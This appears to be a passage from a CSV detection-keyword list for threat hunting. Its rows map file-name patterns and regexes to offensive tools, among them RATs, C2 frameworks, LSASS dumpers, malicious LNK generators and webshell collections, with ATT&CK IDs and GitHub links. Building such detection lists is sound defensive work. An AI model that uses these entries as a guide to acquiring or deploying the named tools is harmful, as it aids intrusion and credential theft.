"*\LimeRAT.exe*",".{0,1000}\\LimeRAT\.exe.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","16247"
"*\LimeRAT.sln*",".{0,1000}\\LimeRAT\.sln.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","16248"
"*\LimeRAT.v*.zip*",".{0,1000}\\LimeRAT\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","16249"
"*\LimeRAT-MUSIC.MP3*",".{0,1000}\\LimeRAT\-MUSIC\.MP3.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","16250"
"*\LimitlessNet RAT.exe*",".{0,1000}\\LimitlessNet\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16251"
"*\LinikatzV2\*",".{0,1000}\\LinikatzV2\\.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","0","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","16252"
"*\list_addcomputertodomain.py*",".{0,1000}\\list_addcomputertodomain\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16254"
"*\list_amsiproviders.py*",".{0,1000}\\list_amsiproviders\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16255"
"*\list_amsiproviders.txt*",".{0,1000}\\list_amsiproviders\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16256"
"*\list_applocker.py*",".{0,1000}\\list_applocker\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16257"
"*\list_applocker.txt*",".{0,1000}\\list_applocker\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16258"
"*\list_asreproast.py*",".{0,1000}\\list_asreproast\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16259"
"*\list_asreproast.txt*",".{0,1000}\\list_asreproast\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16260"
"*\list_autoruns.py*",".{0,1000}\\list_autoruns\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16261"
"*\list_autoruns.txt*",".{0,1000}\\list_autoruns\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16262"
"*\list_clipboard.py*",".{0,1000}\\list_clipboard\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16263"
"*\list_clipboard.txt*",".{0,1000}\\list_clipboard\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16264"
"*\list_domaininfo.py*",".{0,1000}\\list_domaininfo\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16265"
"*\list_lapspassword.py*",".{0,1000}\\list_lapspassword\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16266"
"*\list_lapspassword.txt*",".{0,1000}\\list_lapspassword\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16267"
"*\list_localadmins.py*",".{0,1000}\\list_localadmins\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16268"
"*\list_localadmins.txt*",".{0,1000}\\list_localadmins\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16269"
"*\list_localusers.py*",".{0,1000}\\list_localusers\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16270"
"*\list_localusers.txt*",".{0,1000}\\list_localusers\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16271"
"*\list_passwordnotrequired.py*",".{0,1000}\\list_passwordnotrequired\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16272"
"*\list_passwordnotrequired.txt*",".{0,1000}\\list_passwordnotrequired\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16273"
"*\list_passwordpolicy.py*",".{0,1000}\\list_passwordpolicy\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16274"
"*\list_passwordpolicy.txt*",".{0,1000}\\list_passwordpolicy\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16275"
"*\list_recentcommands.py*",".{0,1000}\\list_recentcommands\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16276"
"*\list_recentcommands.txt*",".{0,1000}\\list_recentcommands\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16277"
"*\list_recyclebin.py*",".{0,1000}\\list_recyclebin\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16278"
"*\list_recyclebin.txt*",".{0,1000}\\list_recyclebin\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16279"
"*\list_scheduledtasks.py*",".{0,1000}\\list_scheduledtasks\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16280"
"*\list_scheduledtasks.txt*",".{0,1000}\\list_scheduledtasks\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16281"
"*\list_whoami.py*",".{0,1000}\\list_whoami\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16282"
"*\list_whoami.txt*",".{0,1000}\\list_whoami\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16283"
"*\ListAllUsers.ps1*",".{0,1000}\\ListAllUsers\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16284"
"*\ListLogged-inUsers.ps1*",".{0,1000}\\ListLogged\-inUsers\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16285"
"*\ListRDPConnections.exe*",".{0,1000}\\ListRDPConnections\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16286"
"*\LiveMicrophone.dll*",".{0,1000}\\LiveMicrophone\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","16288"
"*\Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php*",".{0,1000}\\Liz0ziM\sPrivate\sSafe\sMode\sCommand\sExecuriton\sBypass\sExploit\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16289"
"*\lnk_parser_cmd.exe -r *",".{0,1000}\\lnk_parser_cmd\.exe\s\-r\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16303"
"*\Lnk2Pwn.java*",".{0,1000}\\Lnk2Pwn\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","16304"
"*\Lnk2PwnFrame.java*",".{0,1000}\\Lnk2PwnFrame\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","16305"
"*\lnk2pwn-master*",".{0,1000}\\lnk2pwn\-master.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","16306"
"*\lnkbomb.py*",".{0,1000}\\lnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","16307"
"*\lnkbomb-1.0\*",".{0,1000}\\lnkbomb\-1\.0\\.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","16308"
"*\Lnk-Sweeper.ps1*",".{0,1000}\\Lnk\-Sweeper\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16309"
"*\Lnk-Sweeper.txt*",".{0,1000}\\Lnk\-Sweeper\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16310"
"*\LNKUp\generate.py*",".{0,1000}\\LNKUp\\generate\.py.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","16311"
"*\load_ssp.x64.exe*",".{0,1000}\\load_ssp\.x64\.exe.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","16312"
"*\loadbalancer.py*",".{0,1000}\\loadbalancer\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","16313"
"*\loader.x64.exe*",".{0,1000}\\loader\.x64\.exe.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","16314"
